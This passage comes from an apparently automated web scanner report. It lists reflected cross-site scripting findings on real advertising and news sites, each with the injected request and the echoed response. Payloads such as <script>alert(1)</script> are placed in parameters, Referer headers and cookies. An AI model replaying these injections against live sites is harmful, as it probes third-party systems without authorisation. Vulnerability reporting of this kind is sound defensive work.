Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; MAD_FIRSTPAGE=1; MADTEST=1; __utmz=11603627.1305206897.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=11603627.345061338.1305206897.1305206897.1305206897.1; __utmc=11603627; __utmb=11603627.2.10.1305206897; mad_rsi_segs=ASK05540_10572&ASK05540_10573&ASK05540_10578&ASK05540_10276&ASK05540_10066&ASK05540_10087&ASK05540_10174&ASK05540_10185&ASK05540_10195&ASK05540_10225&ASK05540_10269&ASK05540_10279&ASK05540_10283&ASK05540_10287&ASK05540_10290&ASK05540_10319&ASK05540_10342&ASK05540_10343&ASK05540_10354&ASK05540_10390&ASK05540_10391&ASK05540_10394&ASK05540_10395&ASK05540_10432&ASK05540_10458&ASK05540_10537&ASK05540_10538&ASK05540_10562&ASK05540_10265&ASK05540_10166&ASK05540_10249&ASK05540_10263&ASD08734_72078; __csref=; __cst=78ae66beea02e0ce; __csv=6522d442e56f04a6|0; __csnv=614cd52b5cceb9eb; __ctl=6522d442e56f04a61; XCLGFbrowser=Cg8JIk24ijttAAAASDs

Response

HTTP/1.1 404 Not Found
Date: Thu, 12 May 2011 13:32:19 GMT
Server: Apache
Status: 404 Not Found
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 44036

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
<link rel="canonical" href="http://www.zdnet.com/937ea"><a>15ddfa8a42c" />
...[SNIP]...
2.133. http://z.about.com/6g/ip/284/27.htm [s parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://z.about.com
Path:   /6g/ip/284/27.htm

Issue detail

The value of the s request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eee74'%3balert(1)//693455e81fa was submitted in the s parameter. This input was echoed as eee74';alert(1)//693455e81fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /6g/ip/284/27.htm?s=urbanlegendseee74'%3balert(1)//693455e81fa HTTP/1.1
Host: z.about.com
Proxy-Connection: keep-alive
Referer: http://urbanlegends.about.com/b/2011/05/10/poll-superstitious-about-friday-the-13th.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TMog=B5312m3f20kA052n; jsc=13; Mint=B5CDUi2520kA1h03; zBT=1; pc=1; zFD=B5C1B5310B50220B00202; zRf=-2; gs=urbanlegends

Response

HTTP/1.1 200 OK
Age: 1
Date: Thu, 12 May 2011 13:33:11 GMT
Expires: Thu, 12 May 2011 14:33:11 GMT
Cache-Control: max-age=3600
Connection: Keep-Alive
ETag: "KXDIJCDIDLXSXXPPP"
Server: Apache
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: text/html
Content-Length: 1385

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>About.com Special Features</title></head>

<style>html, body, div, span, h3, h
...[SNIP]...
<script type="text/javascript">function zr(m){return Math.floor(Math.random()*99999)%m}
zDL=new Date();zTbC=0;gs='urbanlegendseee74';alert(1)//693455e81fa';ch='';
function zT(l,p){m=new Date(),n=m.getTime()-zDL.getTime(),u='_',t=l.href;l.href='http://clk.about.com/?zi='+p+'&sdn='+gs+'&cdn='+ch+'&tm='+Math.round(n/1000)+(zTbC?'&acs='+zTbC:'')+'&bts=1&zu=
...[SNIP]...
2.134. http://adserving2.cpxinteractive.com/st [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://adserving2.cpxinteractive.com
Path:   /st

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1400'-alert(1)-'26e8be3e852 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /st?ad_type=iframe&ad_size=300x250&section=1588565 HTTP/1.1
Host: adserving2.cpxinteractive.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=f1400'-alert(1)-'26e8be3e852
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 13-May-2011 13:33:28 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Thu, 12 May 2011 13:33:28 GMT
Content-Length: 604

<script type="text/javascript">document.write('<scr'+'ipt type="text/javascript" src="http://ib.adnxs.com/ptj?member=541&size=300x250&inv_code=1588565&referrer=http://www.google.com/search%3Fhl=en%26q=f1400'-alert(1)-'26e8be3e852&redir=http%3A%2F%2Fad.yieldmanager.com%2Fst%3Fanmember%3D541%26anprice%3D%7BPRICEBUCKET%7D%26ad_type%3Dad%26ad_size%3D300x250%26section%3D1588565">
...[SNIP]...
2.135. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74cb2"><a>261d8688779 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: 74cb2"><a>261d8688779

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:58 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Fri, 11-May-2012 13:28:58 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 111029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
/r=8041&amp;sg=505129&amp;o=6037%253A13616%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2100&amp;nd=13616&amp;pid=&amp;cid=207595&amp;pp=100&amp;e=&amp;rqid=01c13-ad-e7:4DCB7DA94F2C06&amp;orh=74cb2"><a>261d8688779&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=74cb2">
...[SNIP]...
2.136. http://www.zdnet.com/blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.zdnet.com
Path:   /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24a3d"><a>e333a2fc2f5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /blog/computers/can-intel-cedar-trail-atom-processors-along-with-google-chromebooks-resurrect-the-netbook/5773 HTTP/1.1
Host: www.zdnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: 24a3d"><a>e333a2fc2f5

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:28:32 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22vt%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%225%22%2C%22metrocode%22%3A%22523%22%2C%22longittude%22%3A%22-72.646%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22stowe%22%2C%22cityconf%22%3A%225%22%2C%22citycode%22%3A%227029%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2246%22%2C%22latitude%22%3A%2244.5%22%7D; expires=Fri, 11-May-2012 13:28:32 GMT; path=/; domain=.zdnet.com
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 111103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...
/i/r=9953&amp;sg=1815&amp;o=6037%253A13616%253A&amp;h=cn&amp;p=&amp;b=2&amp;l=&amp;site=2&amp;pt=2100&amp;nd=13616&amp;pid=&amp;cid=207595&amp;pp=100&amp;e=&amp;rqid=00c13-ad-e2:4DCB83254AEF44&amp;orh=24a3d"><a>e333a2fc2f5&amp;ort=&amp;oepartner=&amp;epartner=&amp;ppartner=&amp;pdom=24a3d">
...[SNIP]...
2.137. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The value of the C3UID cookie is copied into the HTML document as plain text between tags. The payload 3bca7<script>alert(1)</script>045da951e20 was submitted in the C3UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=130145721913036138033bca7<script>alert(1)</script>045da951e20; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadver_05-11-2011-14-59-16_8816927001305125956ZZZZadcon_05-11-2011-14-59-56_9087559411305125996; SERVERID=s15

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:35:06 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 15-May-2011 13:35:06 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=aol_05-05-2011-12-43-39_11076048371304599419ZZZZadcon_05-11-2011-14-59-56_9087559411305125996ZZZZadver_05-12-2011-13-35-06_15024998381305207306; expires=Tue, 10-May-2016 13:35:06 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_15024998381305207306; expires=Thu, 12-May-2011 13:50:06 GMT; path=/; domain=c3metrics.com
Content-Length: 6700
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...
].loadNewP();this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnid='adver';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJScid='480';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuid='130145721913036138033bca7<script>alert(1)</script>045da951e20';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSnuid='15024998381305207306';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJStv='72';this.C3VTcallVar.c3VJScollection[a].c3VJS.c3VJSuidSet='Y';this.C3VTca
...[SNIP]...
2.138. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 68287<script>alert(1)</script>04ab1212fa was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=207615189 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_3PC=168287<script>alert(1)</script>04ab1212fa; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1305206896%2E017%2Cwait%2D%3E10000%2C; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:33:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=51&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 12 13:33:33 2011&prad=253735207&arc=207615189&; expires=Wed 10-Aug-2011 13:33:33 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25944

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"207615189",Location:
...[SNIP]...
011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&', "ar_p85001580": 'exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&', "BMX_3PC": '168287<script>alert(1)</script>04ab1212fa', "ar_p92429851": 'exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19
...[SNIP]...
2.139. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 760be<script>alert(1)</script>4fe4a12fecf was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253735207&AR_C=207615189 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?uilKAFF8CQD5Q0gAAAAAAFufCgAAAAAAAgAAAAYAAAAAAP8AAAAFCW8VDwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABgyQQAAAAAAAIAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABa8F1Eo8UUCvN5p9OBJ4HIO6F18GIqSmJVEsk5AAAAAA==,,http%3A%2F%2Fwww.mysuburbanlife.com%2Flyons%2Flifestyle%2Fentertainment%2Fx1539859994%2Fto-do-tonight-watch-american-idol-priest-opens-friday-the-13th,Z%3D728x90%26s%3D621649%26_salt%3D1477449765%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.mysuburbanlife.com%252Flyons%252Flifestyle%252Fentertainment%252Fx1539859994%252FTo-do-tonight-Watch-American-Idol-Priest-opens-Friday-the-13th%26r%3D0,1c5cab68-7c9c-11e0-acd7-cb9ffa1aa3ae
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p97174789=exp=50&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 15:02:57 2011&prad=253732016&arc=194941096&; ar_p82806590=exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1305206896%2E017%2Cwait%2D%3E10000%2C760be<script>alert(1)</script>4fe4a12fecf; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 May 2011 13:33:33 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=51&initExp=Sun Apr 24 12:09:48 2011&recExp=Thu May 12 13:33:33 2011&prad=253735207&arc=207615189&; expires=Wed 10-Aug-2011 13:33:33 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25945

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253735207",Pid:"p97174789",Arc:"207615189",Location:
...[SNIP]...
096&', "ar_p82806590": 'exp=3&initExp=Thu Apr 28 21:29:14 2011&recExp=Thu May 12 13:28:16 2011&prad=62874418&arc=40422013&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1305206896%2E017%2Cwait%2D%3E10000%2C760be<script>alert(1)</script>4fe4a12fecf', "ar_s_p81479006": '1', "ar_p90452457": 'exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&', "ar_p84552060": 'exp=1&initExp=Wed Apr 27 19:31:14 2
...[SNIP]...
2.140. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

